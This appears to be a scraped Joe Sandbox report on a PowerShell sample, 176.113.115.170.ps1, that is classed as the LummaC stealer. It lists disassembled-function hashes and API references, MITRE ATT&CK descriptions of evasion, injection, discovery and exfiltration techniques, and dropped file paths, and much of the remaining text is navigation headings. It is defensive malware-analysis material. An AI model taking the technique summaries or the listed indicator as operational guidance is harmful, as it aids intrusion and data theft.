Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 63507484b2069e2e8211a278e3cf8cd1c2c15e4e039033c761ca6b325ddcdd3c
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 94112C336041D50ED3119D3C8500566BFD30AD7334F1BD3DAF4B8972D2D6268D8A8359

Function 0042AAC0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b5d740ace398df56c1bc651b30677a1090a792db8fb55b3a5b1b7746f8ad41c
Instruction ID: a0f30dc86e724eb7f88f9efd602dd5de4cd53b28ec3d007000181f31979604c4
Opcode Fuzzy Hash: 7b5d740ace398df56c1bc651b30677a1090a792db8fb55b3a5b1b7746f8ad41c
Instruction Fuzzy Hash: 67019EB1B0031197E6209E25A5C1B27B6A96F94708F18003EED0657342DB7DFC24C29B

Function 0043C990 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6d6b89a0769f86010591fd06291181582dea7eebbe521dc95f02f92bd725890
Instruction ID: ef255d715ab18d882adc5ea52eeea8cbfa11f5837c70251ee56aeac1239934a6
Opcode Fuzzy Hash: b6d6b89a0769f86010591fd06291181582dea7eebbe521dc95f02f92bd725890
Instruction Fuzzy Hash: 410126B5B052264BD720EE55ECC073F7756A7DE711F1EA07AD48077305D2348C419399

Function 0041C300 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
Instruction ID: 3b5a2521859e6f9e2b7c42681b895aeeefce9f58c49972f42ecf2407dd3de83c
Opcode Fuzzy Hash: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
Instruction Fuzzy Hash: 91F03160104B914AD7328F3985643B3FFE09B13218F545A4DC9E357AD2D36AD14A8798

Function 0043EDC1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c87cf7490ba7f349dbf4ff6d15317452443a64d08c45edd5236fd878cf74ed6
Instruction ID: 6759ef11ba54ebcff8aa8f6da36673660d6dd1d1c904dc71617b67ba0d321406
Opcode Fuzzy Hash: 2c87cf7490ba7f349dbf4ff6d15317452443a64d08c45edd5236fd878cf74ed6
Instruction Fuzzy Hash: EC01B174E412688BCB24CF66E8912BEB7B1FF56305F186068E482FB380DB358C05CB59

Function 0042C850 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f4e3217fe9b5c4e997299aec1ba0aa40f02e45b7d4679749b3d65f6db5070c
Instruction ID: 934d56785e493b3be4b0c9c008a8aca41c7e0e8933f1bbf3a4c9d2d3fb154c99
Opcode Fuzzy Hash: 98f4e3217fe9b5c4e997299aec1ba0aa40f02e45b7d4679749b3d65f6db5070c
Instruction Fuzzy Hash: 16F0F0244086938ADB059F2980A0776FBA1AF23345F2C41DEC4C0AB393CB2AC8068758

Function 0042E0DA Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
Instruction ID: 53e9e5a03a9e822e66d5819fe35fee1f40f302e6fc978103a9a9be73ad9cdb27
Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
Instruction Fuzzy Hash: C7F065105087F28ADB234B3E54606B3AFE09B63120B581BD6C8E19B3C7C3199497C36A

Function 0042D116 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6e45a90e1ceaff6c5d0e3e053bdb80ffa80649d360dfdb931296267ad3d0f33
Instruction ID: e2807706931cebe5a4fd8447433720849932be0b4ea6b6dd525263aa63fc0ea0
Opcode Fuzzy Hash: f6e45a90e1ceaff6c5d0e3e053bdb80ffa80649d360dfdb931296267ad3d0f33
Instruction Fuzzy Hash: 270149306042428BD344CF38CCA056BFBA1EB83324F08C79DC45687796C638C442C799

Function 0040C805 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f87736648c9b6f2dd64c8d371659d93ba6f9c6e5d05e4d379e6cf43d16ee00
Instruction ID: 2cc704b116e4bd3b8fd511eeb7f6c98f4211d06ad42a95779158915a2f3845ef
Opcode Fuzzy Hash: c4f87736648c9b6f2dd64c8d371659d93ba6f9c6e5d05e4d379e6cf43d16ee00
Instruction Fuzzy Hash: C6C0123C583840DF83088F20EC08879B374BB0B202B006824E807E33A2CB22A511AA6E

Function 004237D6 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40189d29a415ea6312dcdd67a1103e7914f9f9b1922703845f218493d16d700
Instruction ID: b006575f33bb30629b5eebf8556c7f8348362c77d274ae0a1f7cd2f0d910ddfd
Opcode Fuzzy Hash: a40189d29a415ea6312dcdd67a1103e7914f9f9b1922703845f218493d16d700
Instruction Fuzzy Hash: 92B092B4A1C2018A87088F00E140039EAB4629F202F30A02E908A63215C225C1058A8E

Function 0043315D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 85COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004331A3

Strings

j, xrefs: 00433207
y, xrefs: 004331D5
q, xrefs: 004331F3
A, xrefs: 004331CB
D, xrefs: 004331DF
w, xrefs: 00433231
K, xrefs: 004331FD
M, xrefs: 00433221
B, xrefs: 004331C1
B, xrefs: 004331E9

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: InitVariant
String ID: A$B$B$D$K$M$j$q$w$y
API String ID: 1927566239-3160828158
Opcode ID: eddacfeeedbf2f75f6d5a413a3fd0e74a564a643395569db151e54d21141464b
Instruction ID: 1c928e62d6be9c8abd40ab69893dd7e66488cb55e0e55af33186cf6b993705b4
Opcode Fuzzy Hash: eddacfeeedbf2f75f6d5a413a3fd0e74a564a643395569db151e54d21141464b
Instruction Fuzzy Hash: 6241287050CBC18AD335DB38845879EBFD16BD2214F188A9DE2E94B3E2D7788145CB57

Function 0043240F Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 148memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00432482

Strings

c, xrefs: 0043242C
g, xrefs: 00432440
f, xrefs: 0043243B
e, xrefs: 00432436
a, xrefs: 00432422
0, xrefs: 0043270A

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: AllocString
String ID: 0$a$c$e$f$g
API String ID: 2525500382-100324306
Opcode ID: 6fa382de4c939dc68479ac497997f55f83f35014caf28410cf75d298f2d01ba0
Instruction ID: 2beeffe621b162477516d1a3ffd6e32473519446922c4ca7b5322f15d7df1e3d
Opcode Fuzzy Hash: 6fa382de4c939dc68479ac497997f55f83f35014caf28410cf75d298f2d01ba0
Instruction Fuzzy Hash: EB91812110DBC28DD3328A7C595879BBED16BA7234F484B9EE0E98B3E6D7704106C767

Function 00432A42 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00432A4C
VariantInit.OLEAUT32 ref: 00432A5F

Strings

T, xrefs: 00432AFD
P, xrefs: 00432B1D
C, xrefs: 00432B2D
C, xrefs: 00432B0D

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: Variant$ClearInit
String ID: C$C$P$T
API String ID: 2610073882-3051599793
Opcode ID: 70cc15cec2ffaa4e64ca4ef94809e37c86eda4dcb3d81504480f7fa9456d32e2
Instruction ID: 97d45b2a61606388edab5b45fc9f71e82de55712b11621588c9e0c32b5ea6509
Opcode Fuzzy Hash: 70cc15cec2ffaa4e64ca4ef94809e37c86eda4dcb3d81504480f7fa9456d32e2
Instruction Fuzzy Hash: 0141E52000C7C18AD3728B38845979FBFE06B96324F488A9DD4ED8B3D2DB754149DB53

Function 0042D7EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042D898

Strings

#v, xrefs: 0042D898
;87>, xrefs: 0042DBEB

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: FreeLibrary
String ID: ;87>$#v
API String ID: 3664257935-1791543496
Opcode ID: 8948d3cd5bc622644077d860e0ab694d6f95e2090f86dfe1e4841dcaad48535a
Instruction ID: 6bca69879cb3e651ebc8ca0b13598fe737171d623fe99421924d523c2323336e
Opcode Fuzzy Hash: 8948d3cd5bc622644077d860e0ab694d6f95e2090f86dfe1e4841dcaad48535a
Instruction Fuzzy Hash: FF214B70A043928FDB218F25D850727BFE1AF4B301F68869AD4D28B396D6389842CB15

Function 004345DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0043460B
GetSystemMetrics.USER32 ref: 0043461A

Strings

, xrefs: 004346C8

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 21c571957f9eedbc13ecd4bfc36bc2f66f2a3654bfb69307476122a183b7950a
Instruction ID: a44d6496935459a921f5505b3ec94aa74778db30aba9446cb93c37adee0bb457
Opcode Fuzzy Hash: 21c571957f9eedbc13ecd4bfc36bc2f66f2a3654bfb69307476122a183b7950a
Instruction Fuzzy Hash: D0317DF49143149FDB00EFA8D98561EBBF4BB89704F11852EE898DB364D374A948CF86

Function 0042D893 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042D898

Strings

#v, xrefs: 0042D898
;87>, xrefs: 0042DBEB

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: FreeLibrary
String ID: ;87>$#v
API String ID: 3664257935-1791543496
Opcode ID: fd3193656894a668b22de869095197b6b1e72f9b9e7d47cf1e04037ab90bc313
Instruction ID: 86d99b7f9b2e41fbf427bd52e774bdff68d06f883e7a09e1f2f077771d0b6d71
Opcode Fuzzy Hash: fd3193656894a668b22de869095197b6b1e72f9b9e7d47cf1e04037ab90bc313
Instruction Fuzzy Hash: D6112BB1600602CFD7118F35EC5072BBBE2FF4B311F59C6A9D4968B392EA389842CB55

Function 0040B7B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408A31), ref: 0040B7B6
FreeLibrary.KERNEL32 ref: 0040B7D7

Strings

#v, xrefs: 0040B7B6, 0040B7D7

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: FreeLibrary
String ID: #v
API String ID: 3664257935-554117064
Opcode ID: da798694984a35fde46e4bcd63e174060923e03d5e302a6048e3f29a9fc80685
Instruction ID: 8d13b867a32c3a4b7460dc0ab53feb316509c0c4818bc205b844e3f8a964c7f0
Opcode Fuzzy Hash: da798694984a35fde46e4bcd63e174060923e03d5e302a6048e3f29a9fc80685
Instruction Fuzzy Hash: 0DC002799914029FEF056FA1FE0E8593B22FB5630670401B6B90590632EA6B09B4AB5F

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 176.113.115.170.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1ouyw53.ypu.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qikrmnsn.c4l.psm1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DYV2HRJUKEDHKLEUPOB0.temp

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
176.113.115.170.ps1

Function 00408600 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 351
threadCOMMON

Function 0043E110 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 00409D1E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142
libraryCOMMON

Function 0043E34B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
COMMON

Function 00437764 Relevance: 1.6, APIs: 1, Instructions: 90
COMMON

Function 0043E0A0 Relevance: 1.5, APIs: 1, Instructions: 31
memoryCOMMON

Function 0043E3A9 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 0043C570 Relevance: 1.5, APIs: 1, Instructions: 15
memoryCOMMON

Function 0043C55B Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON